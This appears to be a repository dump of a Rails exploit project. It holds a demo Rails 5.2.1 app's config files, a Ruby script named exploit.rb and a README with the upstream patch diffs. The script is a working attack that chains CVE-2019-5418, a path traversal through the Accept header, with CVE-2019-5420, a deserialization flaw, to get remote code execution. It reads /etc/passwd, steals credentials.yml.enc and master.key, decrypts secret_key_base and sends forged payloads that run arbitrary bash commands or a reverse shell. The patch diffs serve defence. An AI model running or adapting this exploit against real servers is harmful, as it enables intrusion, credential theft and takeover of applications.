66 | 67 | 68 | -------------------------------------------------------------------------------- /demo-5.2.1/config/environments/test.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # The test environment is used exclusively to run your application's 5 | # test suite. You never need to work with it otherwise. Remember that 6 | # your test database is "scratch space" for the test suite and is wiped 7 | # and recreated between test runs. Don't rely on the data there! 8 | config.cache_classes = true 9 | 10 | # Do not eager load code on boot. This avoids loading your whole application 11 | # just for the purpose of running a single test. If you are using a tool that 12 | # preloads Rails for running tests, you may have to set it to true. 13 | config.eager_load = false 14 | 15 | # Configure public file server for tests with Cache-Control for performance. 16 | config.public_file_server.enabled = true 17 | config.public_file_server.headers = { 18 | 'Cache-Control' => "public, max-age=#{1.hour.to_i}" 19 | } 20 | 21 | # Show full error reports and disable caching. 22 | config.consider_all_requests_local = true 23 | config.action_controller.perform_caching = false 24 | 25 | # Raise exceptions instead of rendering exception templates. 26 | config.action_dispatch.show_exceptions = false 27 | 28 | # Disable request forgery protection in test environment. 29 | config.action_controller.allow_forgery_protection = false 30 | 31 | # Store uploaded files on the local file system in a temporary directory 32 | config.active_storage.service = :test 33 | 34 | config.action_mailer.perform_caching = false 35 | 36 | # Tell Action Mailer not to deliver emails to the real world. 37 | # The :test delivery method accumulates sent emails in the 38 | # ActionMailer::Base.deliveries array. 39 | config.action_mailer.delivery_method = :test 40 | 41 | # Print deprecation notices to the stderr. 42 | config.active_support.deprecation = :stderr 43 | 44 | # Raises error for missing translations 45 | # config.action_view.raise_on_missing_translations = true 46 | end 47 | -------------------------------------------------------------------------------- /demo-5.2.1/config/environments/development.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # In the development environment your application's code is reloaded on 5 | # every request. This slows down response time but is perfect for development 6 | # since you don't have to restart the web server when you make code changes. 7 | config.cache_classes = false 8 | 9 | # Do not eager load code on boot. 10 | config.eager_load = false 11 | 12 | # Show full error reports. 13 | config.consider_all_requests_local = true 14 | 15 | # Enable/disable caching. By default caching is disabled. 16 | # Run rails dev:cache to toggle caching. 17 | if Rails.root.join('tmp', 'caching-dev.txt').exist? 18 | config.action_controller.perform_caching = true 19 | 20 | config.cache_store = :memory_store 21 | config.public_file_server.headers = { 22 | 'Cache-Control' => "public, max-age=#{2.days.to_i}" 23 | } 24 | else 25 | config.action_controller.perform_caching = false 26 | 27 | config.cache_store = :null_store 28 | end 29 | 30 | # Store uploaded files on the local file system (see config/storage.yml for options) 31 | config.active_storage.service = :local 32 | 33 | # Don't care if the mailer can't send. 34 | config.action_mailer.raise_delivery_errors = false 35 | 36 | config.action_mailer.perform_caching = false 37 | 38 | # Print deprecation notices to the Rails logger. 39 | config.active_support.deprecation = :log 40 | 41 | # Raise an error on page load if there are pending migrations. 42 | config.active_record.migration_error = :page_load 43 | 44 | # Highlight code that triggered database queries in logs. 45 | config.active_record.verbose_query_logs = true 46 | 47 | # Debug mode disables concatenation and preprocessing of assets. 48 | # This option may cause significant delays in view rendering with a large 49 | # number of complex assets. 50 | config.assets.debug = true 51 | 52 | # Suppress logger output for asset requests. 53 | config.assets.quiet = true 54 | 55 | # Raises error for missing translations 56 | # config.action_view.raise_on_missing_translations = true 57 | 58 | # Use an evented file watcher to asynchronously detect changes in source code, 59 | # routes, locales, etc. This feature depends on the listen gem. 60 | config.file_watcher = ActiveSupport::EventedFileUpdateChecker 61 | end 62 | -------------------------------------------------------------------------------- /demo-5.2.1/Gemfile: -------------------------------------------------------------------------------- 1 | source 'https://rubygems.org' 2 | git_source(:github) { |repo| "https://github.com/#{repo}.git" } 3 | 4 | ruby '2.5.1' 5 | 6 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails' 7 | gem 'rails', '= 5.2.1' 8 | # Use sqlite3 as the database for Active Record 9 | gem 'sqlite3', '~> 1.3.6' 10 | # Use Puma as the app server 11 | gem 'puma', '~> 3.11' 12 | # Use SCSS for stylesheets 13 | gem 'sass-rails', '~> 5.0' 14 | # Use Uglifier as compressor for JavaScript assets 15 | gem 'uglifier', '>= 1.3.0' 16 | # See https://github.com/rails/execjs#readme for more supported runtimes 17 | # gem 'mini_racer', platforms: :ruby 18 | 19 | # Use CoffeeScript for .coffee assets and views 20 | gem 'coffee-rails', '~> 4.2' 21 | # Turbolinks makes navigating your web application faster. Read more: https://github.com/turbolinks/turbolinks 22 | gem 'turbolinks', '~> 5' 23 | # Build JSON APIs with ease. Read more: https://github.com/rails/jbuilder 24 | gem 'jbuilder', '~> 2.5' 25 | # Use Redis adapter to run Action Cable in production 26 | # gem 'redis', '~> 4.0' 27 | # Use ActiveModel has_secure_password 28 | # gem 'bcrypt', '~> 3.1.7' 29 | 30 | # Use ActiveStorage variant 31 | # gem 'mini_magick', '~> 4.8' 32 | 33 | # Use Capistrano for deployment 34 | # gem 'capistrano-rails', group: :development 35 | 36 | # Reduces boot times through caching; required in config/boot.rb 37 | gem 'bootsnap', '>= 1.1.0', require: false 38 | 39 | group :development, :test do 40 | # Call 'byebug' anywhere in the code to stop execution and get a debugger console 41 | gem 'byebug', platforms: [:mri, :mingw, :x64_mingw] 42 | end 43 | 44 | group :development do 45 | # Access an interactive console on exception pages or by calling 'console' anywhere in the code. 46 | gem 'web-console', '>= 3.3.0' 47 | gem 'listen', '>= 3.0.5', '< 3.2' 48 | # Spring speeds up development by keeping your application running in the background. Read more: https://github.com/rails/spring 49 | gem 'spring' 50 | gem 'spring-watcher-listen', '~> 2.0.0' 51 | end 52 | 53 | group :test do 54 | # Adds support for Capybara system testing and selenium driver 55 | gem 'capybara', '>= 2.15' 56 | gem 'selenium-webdriver' 57 | # Easy installation and use of chromedriver to run system tests with Chrome 58 | gem 'chromedriver-helper' 59 | end 60 | 61 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem 62 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby] 63 | -------------------------------------------------------------------------------- /demo-5.2.1/config/environments/production.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # Code is not reloaded between requests. 5 | config.cache_classes = false 6 | 7 | # Eager load code on boot. This eager loads most of Rails and 8 | # your application in memory, allowing both threaded web servers 9 | # and those relying on copy on write to perform better. 10 | # Rake tasks automatically ignore this option for performance. 11 | config.eager_load = true 12 | 13 | # Full error reports are disabled and caching is turned on. 14 | config.consider_all_requests_local = false 15 | config.action_controller.perform_caching = true 16 | 17 | # Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"] 18 | # or in config/master.key. This key is used to decrypt credentials (and other encrypted files). 19 | # config.require_master_key = true 20 | 21 | # Disable serving static files from the `/public` folder by default since 22 | # Apache or NGINX already handles this. 23 | config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present? 24 | 25 | # Compress JavaScripts and CSS. 26 | config.assets.js_compressor = :uglifier 27 | # config.assets.css_compressor = :sass 28 | 29 | # Do not fallback to assets pipeline if a precompiled asset is missed. 30 | config.assets.compile = false 31 | 32 | # `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb 33 | 34 | # Enable serving of images, stylesheets, and JavaScripts from an asset server. 35 | # config.action_controller.asset_host = 'http://assets.example.com' 36 | 37 | # Specifies the header that your server uses for sending files. 38 | # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache 39 | # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX 40 | 41 | # Store uploaded files on the local file system (see config/storage.yml for options) 42 | config.active_storage.service = :local 43 | 44 | # Mount Action Cable outside main process or domain 45 | # config.action_cable.mount_path = nil 46 | # config.action_cable.url = 'wss://example.com/cable' 47 | # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ] 48 | 49 | # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies. 50 | # config.force_ssl = true 51 | 52 | # Use the lowest log level to ensure availability of diagnostic information 53 | # when problems arise. 54 | config.log_level = :debug 55 | 56 | # Prepend all log lines with the following tags. 57 | config.log_tags = [ :request_id ] 58 | 59 | # Use a different cache store in production. 60 | # config.cache_store = :mem_cache_store 61 | 62 | # Use a real queuing backend for Active Job (and separate queues per environment) 63 | # config.active_job.queue_adapter = :resque 64 | # config.active_job.queue_name_prefix = "demo-5_2_1_#{Rails.env}" 65 | 66 | config.action_mailer.perform_caching = false 67 | 68 | # Ignore bad email addresses and do not raise email delivery errors. 69 | # Set this to true and configure the email server for immediate delivery to raise delivery errors. 70 | # config.action_mailer.raise_delivery_errors = false 71 | 72 | # Enable locale fallbacks for I18n (makes lookups for any locale fall back to 73 | # the I18n.default_locale when a translation cannot be found). 74 | config.i18n.fallbacks = true 75 | 76 | # Send deprecation notices to registered listeners. 77 | config.active_support.deprecation = :notify 78 | 79 | # Use default logging formatter so that PID and timestamp are not suppressed. 80 | config.log_formatter = ::Logger::Formatter.new 81 | 82 | # Use a different logger for distributed setups. 83 | # require 'syslog/logger' 84 | # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name') 85 | 86 | if ENV["RAILS_LOG_TO_STDOUT"].present? 87 | logger = ActiveSupport::Logger.new(STDOUT) 88 | logger.formatter = config.log_formatter 89 | config.logger = ActiveSupport::TaggedLogging.new(logger) 90 | end 91 | 92 | # Do not dump schema after migrations. 93 | config.active_record.dump_schema_after_migration = false 94 | end 95 | -------------------------------------------------------------------------------- /exploit.rb: -------------------------------------------------------------------------------- 1 | require 'erb' 2 | require "./demo-5.2.1/config/environment" 3 | require "base64" 4 | require 'net/http' 5 | 6 | $proxy_addr = '127.0.0.1' 7 | $proxy_port = 8080 8 | 9 | $remote = "http://172.18.0.3:3000" 10 | $ressource = "/demo" 11 | 12 | puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n" 13 | 14 | print "[+] Checking if vulnerable to CVE-2019-5418 => " 15 | uri = URI($remote + $ressource) 16 | req = Net::HTTP::Get.new(uri) 17 | req['Accept'] = "../../../../../../../../../../etc/passwd{{" 18 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 19 | http.request(req) 20 | } 21 | if res.body.include? "root:x:0:0:root:" 22 | puts "\033[92mOK\033[0m" 23 | else 24 | puts "KO" 25 | abort 26 | end 27 | 28 | print "[+] Getting file => credentials.yml.enc => " 29 | path = "../../../../../../../../../../config/credentials.yml.enc{{" 30 | for $i in 0..9 31 | uri = URI($remote + $ressource) 32 | req = Net::HTTP::Get.new(uri) 33 | req['Accept'] = path[3..57] 34 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 35 | http.request(req) 36 | } 37 | if res.code == "200" 38 | puts "\033[92mOK\033[0m" 39 | File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) } 40 | break 41 | end 42 | path = path[3..57] 43 | $i +=1; 44 | end 45 | 46 | print "[+] Getting file => master.key => " 47 | path = "../../../../../../../../../../config/master.key{{" 48 | for $i in 0..9 49 | uri = URI($remote + $ressource) 50 | req = Net::HTTP::Get.new(uri) 51 | req['Accept'] = path[3..57] 52 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 53 | http.request(req) 54 | } 55 | if res.code == "200" 56 | puts "\033[92mOK\033[0m" 57 | File.open("master.key", 'w') { |file| file.write(res.body) } 58 | break 59 | end 60 | path = path[3..57] 61 | $i +=1; 62 | end 63 | 64 | print "[+] Decrypt secret_key_base => " 65 | credentials_config_path = File.join("../", "credentials.yml.enc") 66 | credentials_key_path = File.join("../", "master.key") 67 | ENV["RAILS_MASTER_KEY"] = res.body 68 | credentials = ActiveSupport::EncryptedConfiguration.new( 69 | config_path: Rails.root.join(credentials_config_path), 70 | key_path: Rails.root.join(credentials_key_path), 71 | env_key: "RAILS_MASTER_KEY", 72 | raise_if_missing_key: true 73 | ) 74 | if credentials.secret_key_base != nil 75 | puts "\033[92mOK\033[0m" 76 | puts "" 77 | puts "secret_key_base": credentials.secret_key_base 78 | puts "" 79 | end 80 | 81 | puts "[+] Getting reflective command (R) or reverse shell (S) => " 82 | loop do 83 | begin 84 | input = [(print 'Select option R or S: '), gets.rstrip][1] 85 | if input == "R" 86 | puts "Reflective command selected" 87 | command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1] 88 | elsif input == "S" 89 | puts "Reverse shell selected" 90 | command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1] 91 | else 92 | puts "No option selected" 93 | abort 94 | end 95 | 96 | command_b64 = Base64.encode64(command) 97 | 98 | print "[+] Generating payload CVE-2019-5420 => " 99 | secret_key_base = credentials.secret_key_base 100 | key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)) 101 | secret = key_generator.generate_key("ActiveStorage") 102 | verifier = ActiveSupport::MessageVerifier.new(secret) 103 | if input == "R" 104 | code = "system('bash','-c','" + command + " > /tmp/result.txt')" 105 | else 106 | code = "system('bash','-c','" + command + "')" 107 | end 108 | erb = ERB.allocate 109 | erb.instance_variable_set :@src, code 110 | erb.instance_variable_set :@filename, "1" 111 | erb.instance_variable_set :@lineno, 1 112 | dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result 113 | 114 | puts "\033[92mOK\033[0m" 115 | puts "" 116 | url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test" 117 | puts url 118 | puts "" 119 | 120 | print "[+] Sending request => " 121 | uri = URI(url) 122 | req = Net::HTTP::Get.new(uri) 123 | req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 124 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 125 | http.request(req) 126 | } 127 | if res.code == "500" 128 | puts "\033[92mOK\033[0m" 129 | else 130 | puts "KO" 131 | abort 132 | end 133 | 134 | if input == "R" 135 | print "[+] Getting result of command => " 136 | uri = URI($remote + $ressource) 137 | req = Net::HTTP::Get.new(uri) 138 | req['Accept'] = "../../../../../../../../../../tmp/result.txt{{" 139 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 140 | http.request(req) 141 | } 142 | if res.code == "200" 143 | puts "\033[92mOK\033[0m\n\n" 144 | puts res.body 145 | puts "\n" 146 | else 147 | puts "KO" 148 | abort 149 | end 150 | end 151 | 152 | rescue Exception => e 153 | puts "Exiting..." 154 | abort 155 | end 156 | end 157 | -------------------------------------------------------------------------------- /demo-5.2.1/Gemfile.lock: -------------------------------------------------------------------------------- 1 | GEM 2 | remote: https://rubygems.org/ 3 | specs: 4 | actioncable (5.2.1) 5 | actionpack (= 5.2.1) 6 | nio4r (~> 2.0) 7 | websocket-driver (>= 0.6.1) 8 | actionmailer (5.2.1) 9 | actionpack (= 5.2.1) 10 | actionview (= 5.2.1) 11 | activejob (= 5.2.1) 12 | mail (~> 2.5, >= 2.5.4) 13 | rails-dom-testing (~> 2.0) 14 | actionpack (5.2.1) 15 | actionview (= 5.2.1) 16 | activesupport (= 5.2.1) 17 | rack (~> 2.0) 18 | rack-test (>= 0.6.3) 19 | rails-dom-testing (~> 2.0) 20 | rails-html-sanitizer (~> 1.0, >= 1.0.2) 21 | actionview (5.2.1) 22 | activesupport (= 5.2.1) 23 | builder (~> 3.1) 24 | erubi (~> 1.4) 25 | rails-dom-testing (~> 2.0) 26 | rails-html-sanitizer (~> 1.0, >= 1.0.3) 27 | activejob (5.2.1) 28 | activesupport (= 5.2.1) 29 | globalid (>= 0.3.6) 30 | activemodel (5.2.1) 31 | activesupport (= 5.2.1) 32 | activerecord (5.2.1) 33 | activemodel (= 5.2.1) 34 | activesupport (= 5.2.1) 35 | arel (>= 9.0) 36 | activestorage (5.2.1) 37 | actionpack (= 5.2.1) 38 | activerecord (= 5.2.1) 39 | marcel (~> 0.3.1) 40 | activesupport (5.2.1) 41 | concurrent-ruby (~> 1.0, >= 1.0.2) 42 | i18n (>= 0.7, < 2) 43 | minitest (~> 5.1) 44 | tzinfo (~> 1.1) 45 | addressable (2.6.0) 46 | public_suffix (>= 2.0.2, < 4.0) 47 | archive-zip (0.12.0) 48 | io-like (~> 0.3.0) 49 | arel (9.0.0) 50 | bindex (0.5.0) 51 | bootsnap (1.4.1) 52 | msgpack (~> 1.0) 53 | builder (3.2.3) 54 | byebug (11.0.1) 55 | capybara (3.15.0) 56 | addressable 57 | mini_mime (>= 0.1.3) 58 | nokogiri (~> 1.8) 59 | rack (>= 1.6.0) 60 | rack-test (>= 0.6.3) 61 | regexp_parser (~> 1.2) 62 | xpath (~> 3.2) 63 | childprocess (0.9.0) 64 | ffi (~> 1.0, >= 1.0.11) 65 | chromedriver-helper (2.1.0) 66 | archive-zip (~> 0.10) 67 | nokogiri (~> 1.8) 68 | coffee-rails (4.2.2) 69 | coffee-script (>= 2.2.0) 70 | railties (>= 4.0.0) 71 | coffee-script (2.4.1) 72 | coffee-script-source 73 | execjs 74 | coffee-script-source (1.12.2) 75 | concurrent-ruby (1.1.5) 76 | crass (1.0.4) 77 | erubi (1.8.0) 78 | execjs (2.7.0) 79 | ffi (1.10.0) 80 | globalid (0.4.2) 81 | activesupport (>= 4.2.0) 82 | i18n (1.6.0) 83 | concurrent-ruby (~> 1.0) 84 | io-like (0.3.0) 85 | jbuilder (2.8.0) 86 | activesupport (>= 4.2.0) 87 | multi_json (>= 1.2) 88 | listen (3.1.5) 89 | rb-fsevent (~> 0.9, >= 0.9.4) 90 | rb-inotify (~> 0.9, >= 0.9.7) 91 | ruby_dep (~> 1.2) 92 | loofah (2.2.3) 93 | crass (~> 1.0.2) 94 | nokogiri (>= 1.5.9) 95 | mail (2.7.1) 96 | mini_mime (>= 0.1.1) 97 | marcel (0.3.3) 98 | mimemagic (~> 0.3.2) 99 | method_source (0.9.2) 100 | mimemagic (0.3.3) 101 | mini_mime (1.0.1) 102 | mini_portile2 (2.4.0) 103 | minitest (5.11.3) 104 | msgpack (1.2.9) 105 | multi_json (1.13.1) 106 | nio4r (2.3.1) 107 | nokogiri (1.10.1) 108 | mini_portile2 (~> 2.4.0) 109 | public_suffix (3.0.3) 110 | puma (3.12.1) 111 | rack (2.0.6) 112 | rack-test (1.1.0) 113 | rack (>= 1.0, < 3) 114 | rails (5.2.1) 115 | actioncable (= 5.2.1) 116 | actionmailer (= 5.2.1) 117 | actionpack (= 5.2.1) 118 | actionview (= 5.2.1) 119 | activejob (= 5.2.1) 120 | activemodel (= 5.2.1) 121 | activerecord (= 5.2.1) 122 | activestorage (= 5.2.1) 123 | activesupport (= 5.2.1) 124 | bundler (>= 1.3.0) 125 | railties (= 5.2.1) 126 | sprockets-rails (>= 2.0.0) 127 | rails-dom-testing (2.0.3) 128 | activesupport (>= 4.2.0) 129 | nokogiri (>= 1.6) 130 | rails-html-sanitizer (1.0.4) 131 | loofah (~> 2.2, >= 2.2.2) 132 | railties (5.2.1) 133 | actionpack (= 5.2.1) 134 | activesupport (= 5.2.1) 135 | method_source 136 | rake (>= 0.8.7) 137 | thor (>= 0.19.0, < 2.0) 138 | rake (12.3.2) 139 | rb-fsevent (0.10.3) 140 | rb-inotify (0.10.0) 141 | ffi (~> 1.0) 142 | regexp_parser (1.3.0) 143 | ruby_dep (1.5.0) 144 | rubyzip (1.2.2) 145 | sass (3.7.3) 146 | sass-listen (~> 4.0.0) 147 | sass-listen (4.0.0) 148 | rb-fsevent (~> 0.9, >= 0.9.4) 149 | rb-inotify (~> 0.9, >= 0.9.7) 150 | sass-rails (5.0.7) 151 | railties (>= 4.0.0, < 6) 152 | sass (~> 3.1) 153 | sprockets (>= 2.8, < 4.0) 154 | sprockets-rails (>= 2.0, < 4.0) 155 | tilt (>= 1.1, < 3) 156 | selenium-webdriver (3.141.0) 157 | childprocess (~> 0.5) 158 | rubyzip (~> 1.2, >= 1.2.2) 159 | spring (2.0.2) 160 | activesupport (>= 4.2) 161 | spring-watcher-listen (2.0.1) 162 | listen (>= 2.7, < 4.0) 163 | spring (>= 1.2, < 3.0) 164 | sprockets (3.7.2) 165 | concurrent-ruby (~> 1.0) 166 | rack (> 1, < 3) 167 | sprockets-rails (3.2.1) 168 | actionpack (>= 4.0) 169 | activesupport (>= 4.0) 170 | sprockets (>= 3.0.0) 171 | sqlite3 (1.3.13) 172 | thor (0.20.3) 173 | thread_safe (0.3.6) 174 | tilt (2.0.9) 175 | turbolinks (5.2.0) 176 | turbolinks-source (~> 5.2) 177 | turbolinks-source (5.2.0) 178 | tzinfo (1.2.5) 179 | thread_safe (~> 0.1) 180 | uglifier (4.1.20) 181 | execjs (>= 0.3.0, < 3) 182 | web-console (3.7.0) 183 | actionview (>= 5.0) 184 | activemodel (>= 5.0) 185 | bindex (>= 0.4.0) 186 | railties (>= 5.0) 187 | websocket-driver (0.7.0) 188 | websocket-extensions (>= 0.1.0) 189 | websocket-extensions (0.1.3) 190 | xpath (3.2.0) 191 | nokogiri (~> 1.8) 192 | 193 | PLATFORMS 194 | ruby 195 | 196 | DEPENDENCIES 197 | bootsnap (>= 1.1.0) 198 | byebug 199 | capybara (>= 2.15) 200 | chromedriver-helper 201 | coffee-rails (~> 4.2) 202 | jbuilder (~> 2.5) 203 | listen (>= 3.0.5, < 3.2) 204 | puma (~> 3.11) 205 | rails (= 5.2.1) 206 | sass-rails (~> 5.0) 207 | selenium-webdriver 208 | spring 209 | spring-watcher-listen (~> 2.0.0) 210 | sqlite3 (~> 1.3.6) 211 | turbolinks (~> 5) 212 | tzinfo-data 213 | uglifier (>= 1.3.0) 214 | web-console (>= 3.3.0) 215 | 216 | RUBY VERSION 217 | ruby 2.5.1p57 218 | 219 | BUNDLED WITH 220 | 1.16.1 221 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Rails-doubletap-exploit 2 | 3 | RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420) 4 | 5 | ![capture d'écran](https://user-images.githubusercontent.com/5891788/54860812-dc7cc480-4d1f-11e9-8886-6d9c6a05d648.png) 6 | 7 | **Technical Analysis**: 8 | - CVE-2019-5418 - https://github.com/mpgn/CVE-2019-5418 9 | - CVE-2019-5420 - https://hackerone.com/reports/473888 10 | 11 | 12 | **Security Adivsory**: 13 | - CVE-2019-5418 - https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q 14 | - CVE-2019-5420 - https://groups.google.com/forum/#!searchin/rubyonrails-security/CVE-2019-5420 15 | 16 | --- 17 | 18 | ### Exploit 19 | 20 | 1. The exploit check if the Rails application is vulnerable to the **CVE-2019-5418** 21 | 2. Then gets the content of the files: `credentials.yml.enc` and `master.key` 22 | 3. Decrypt the *credentials.yml.enc* and get the **secret_key_base** value 23 | 4. Craft a request to the ressource `/rails/active_storage/disk/:encoded_key/*filename(.:format)` => **CVE-2019-5420** 24 | 5. Send the request to the vulnerable server 25 | 6. The code is executed on the server 26 | 27 | ![capture d'écran_1](https://user-images.githubusercontent.com/5891788/54864755-f2a87600-4d5b-11e9-9eab-8402ea52c978.png) 28 | 29 | **Mitigations** 30 | 31 | - You may notice the cache level is disabled on the exploit, but you can use a race condition to retrieve the two files: https://gist.github.com/snyff/04c3463845480632a1fe192308c31439#file-race_condition-sh 32 | 33 | --- 34 | Fix of **CVE-2019-5420** 35 | 36 | ```diff 37 | From 7f5ccda38bfecbe0bf00f15e5b8f5e40d52ab3f1 Mon Sep 17 00:00:00 2001 38 | From: Aaron Patterson 39 | Date: Sun, 10 Mar 2019 16:37:46 -0700 40 | Subject: [PATCH] Fix possible dev mode RCE 41 | 42 | If the secret_key_base is nil in dev or test generate a key from random 43 | bytes and store it in a tmp file. This prevents the app developers from 44 | having to share / checkin the secret key for dev / test but also 45 | maintains a key between app restarts in dev/test. 46 | 47 | [CVE-2019-5420] 48 | 49 | Co-Authored-By: eileencodes 50 | Co-Authored-By: John Hawthorn 51 | --- 52 | .../middleware/session/cookie_store.rb | 7 +++--- 53 | railties/lib/rails/application.rb | 19 ++++++++++++++-- 54 | .../test/application/configuration_test.rb | 22 ++++++++++++++++++- 55 | railties/test/isolation/abstract_unit.rb | 1 + 56 | 4 files changed, 43 insertions(+), 6 deletions(-) 57 | 58 | diff --git a/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb b/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb 59 | index 4ea96196d3..b7475d3682 100644 60 | --- a/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb 61 | +++ b/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb 62 | @@ -29,9 +29,10 @@ 63 | # 64 | # Rails.application.config.session_store :cookie_store, key: '_your_app_session' 65 | # 66 | - # By default, your secret key base is derived from your application name in 67 | - # the test and development environments. In all other environments, it is stored 68 | - # encrypted in the config/credentials.yml.enc file. 69 | + # In the development and test environments your application's secret key base is 70 | + # generated by Rails and stored in a temporary file in tmp/development_secret.txt. 71 | + # In all other environments, it is stored encrypted in the 72 | + # config/credentials.yml.enc file. 73 | # 74 | # If your application was not updated to Rails 5.2 defaults, the secret_key_base 75 | # will be found in the old config/secrets.yml file. 76 | diff --git a/railties/lib/rails/application.rb b/railties/lib/rails/application.rb 77 | index e346d5cc3a..6a30e8cfa0 100644 78 | --- a/railties/lib/rails/application.rb 79 | +++ b/railties/lib/rails/application.rb 80 | @@ -426,8 +426,8 @@ def secrets=(secrets) #:nodoc: 81 | # then credentials.secret_key_base, and finally secrets.secret_key_base. For most applications, 82 | # the correct place to store it is in the encrypted credentials file. 83 | def secret_key_base 84 | - if Rails.env.test? || Rails.env.development? 85 | - secrets.secret_key_base || Digest::MD5.hexdigest(self.class.name) 86 | + if Rails.env.development? || Rails.env.test? 87 | + secrets.secret_key_base ||= generate_development_secret 88 | else 89 | validate_secret_key_base( 90 | ENV["SECRET_KEY_BASE"] || credentials.secret_key_base || secrets.secret_key_base 91 | @@ -588,6 +588,21 @@ def validate_secret_key_base(secret_key_base) 92 | 93 | private 94 | 95 | + def generate_development_secret 96 | + if secrets.secret_key_base.nil? 97 | + key_file = Rails.root.join("tmp/development_secret.txt") 98 | + 99 | + if !File.exist?(key_file) 100 | + random_key = SecureRandom.hex(64) 101 | + File.binwrite(key_file, random_key) 102 | + end 103 | + 104 | + secrets.secret_key_base = File.binread(key_file) 105 | + end 106 | + 107 | + secrets.secret_key_base 108 | + end 109 | + 110 | def build_request(env) 111 | req = super 112 | env["ORIGINAL_FULLPATH"] = req.fullpath 113 | diff --git a/railties/test/application/configuration_test.rb b/railties/test/application/configuration_test.rb 114 | index 293a1a7dbd..68c2199aba 100644 115 | --- a/railties/test/application/configuration_test.rb 116 | +++ b/railties/test/application/configuration_test.rb 117 | @@ -513,6 +513,27 @@ def index 118 | end 119 | 120 | 121 | + test "application will generate secret_key_base in tmp file if blank in development" do 122 | + app_file "config/initializers/secret_token.rb", <<-RUBY 123 | + Rails.application.credentials.secret_key_base = nil 124 | + RUBY 125 | + 126 | + app "development" 127 | + 128 | + assert_not_nil app.secrets.secret_key_base 129 | + assert File.exist?(app_path("tmp/development_secret.txt")) 130 | + end 131 | + 132 | + test "application will not generate secret_key_base in tmp file if blank in production" do 133 | + app_file "config/initializers/secret_token.rb", <<-RUBY 134 | + Rails.application.credentials.secret_key_base = nil 135 | + RUBY 136 | + 137 | + assert_raises ArgumentError do 138 | + app "production" 139 | + end 140 | + end 141 | + 142 | test "raises when secret_key_base is blank" do 143 | app_file "config/initializers/secret_token.rb", <<-RUBY 144 | Rails.application.credentials.secret_key_base = nil 145 | @@ -550,7 +571,6 @@ def index 146 | 147 | test "application verifier can build different verifiers" do 148 | make_basic_app do |application| 149 | - application.credentials.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33" 150 | application.config.session_store :disabled 151 | end 152 | 153 | diff --git a/railties/test/isolation/abstract_unit.rb b/railties/test/isolation/abstract_unit.rb 154 | index 6568a356d6..fe850d45ec 100644 155 | --- a/railties/test/isolation/abstract_unit.rb 156 | +++ b/railties/test/isolation/abstract_unit.rb 157 | @@ -155,6 +155,7 @@ def self.name; "RailtiesTestApp"; end 158 | @app.config.active_support.deprecation = :log 159 | @app.config.active_support.test_order = :random 160 | @app.config.log_level = :info 161 | + @app.secrets.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33" 162 | 163 | yield @app if block_given? 164 | @app.initialize! 165 | -- 166 | 2.21.0 167 | ``` 168 | 169 | Fix of **CVE-2019-5418** 170 | ```diff 171 | From d7fac9c09a535ec7f11bb9aa8addb4af37b7d4b5 Mon Sep 17 00:00:00 2001 172 | From: John Hawthorn 173 | Date: Mon, 4 Mar 2019 18:24:51 -0800 174 | Subject: [PATCH] Only accept formats from registered mime types 175 | 176 | [CVE-2019-5418] 177 | [CVE-2019-5419] 178 | --- 179 | .../lib/action_dispatch/http/mime_negotiation.rb | 5 +++++ 180 | actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++---- 181 | .../new_base/content_negotiation_test.rb | 14 ++++++++++++-- 182 | 3 files changed, 23 insertions(+), 6 deletions(-) 183 | 184 | diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb 185 | index d7435fa8df..ada52adfeb 100644 186 | --- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb 187 | +++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb 188 | @@ -74,6 +74,11 @@ def formats 189 | else 190 | [Mime[:html]] 191 | end 192 | + 193 | + v = v.select do |format| 194 | + format.symbol || format.ref == "*/*" 195 | + end 196 | + 197 | set_header k, v 198 